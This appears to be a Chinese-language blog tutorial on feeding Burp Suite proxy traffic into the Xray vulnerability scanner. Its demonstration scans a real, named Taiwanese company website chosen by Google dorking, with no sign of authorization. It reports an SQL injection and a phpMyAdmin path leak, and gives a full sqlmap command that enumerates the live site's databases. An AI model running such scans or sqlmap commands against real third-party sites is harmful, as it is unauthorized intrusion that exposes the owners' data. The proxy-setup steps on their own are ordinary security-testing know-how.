一.Xray与burp联动

1.Xray与burp联动,这也就是代理的代理
1.1.该配置该项配置仅对http代理本身生效,不对漏洞扫描发出的请求生效

1.2.假如启动xray时配置的listen为127.0.0.1:1111,upstream_proxy为 http://127.0.0.1:8080

1.2.1.那么浏览器设置代理为 http://127.0.0.1:1111

在这里插入图片描述

2.该配置仅影响代理本身,不会影响插件在漏洞探测时的发包行为

2.1.如果想代理漏洞探测的,请参照接:https://docs.xray.cool/#/configration/http
3.下面开始演示:首先xray建立起webscan的监听,我浏览器与burpsuite的代理端口是8080
.\xray_windows_amd64.exe webscan --listen 127.0.0.1:7777 --html-output proxy.html

在这里插入图片描述

4.使用谷歌语法抽奖台湾一网站测试:https://www.citymark.com.tw/workdetail.php?ID=88

在这里插入图片描述

5.进入burpsuite,打开user options标签页,找到上游代理upstream proxy servers设置

5.1.点击Add添加上游代理以及作用域,Destination host可以使用*匹配多个任意字符串

5.2.?匹配单一任意字符串,而上游代理的地址则填写xray的监听地址

在这里插入图片描述

6.Proxy intercept is off状态,然后在谷歌浏览器使用burp代理或者火狐浏览器的Foxyproxy

https://wiki.wmtransfer.com/projects/webmoney/wiki/Installing_root_certificate_in_Mozilla_Firefox

在这里插入图片描述

7.在浏览器挂起8080的burp代理,会将浏览器发到burpsuite的爬虫数据包传输到xray进行探测

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

8.跑大概10秒钟,发现两个漏洞,一个phpmyadmin后台路径泄露和时间盲注

在这里插入图片描述
在这里插入图片描述

python sqlmap.py -u "https://www.citymark.com.tw/indexDesignAjax.php?ID=58&rand=2101" -p ID --batch --technique B --random-agent --level 3 --risk 2 --dbs
9.可见phpmyadmin和sql注入存在,但经测试并非时间盲注,而是布尔盲注

9.1.上图为数据库信息,tw也是中国,所以没有进行下一步测试,只证明工具的可行性

在这里插入图片描述

Logo

魔乐社区(Modelers.cn) 是一个中立、公益的人工智能社区,提供人工智能工具、模型、数据的托管、展示与应用协同服务,为人工智能开发及爱好者搭建开放的学习交流平台。社区通过理事会方式运作,由全产业链共同建设、共同运营、共同享有,推动国产AI生态繁荣发展。

更多推荐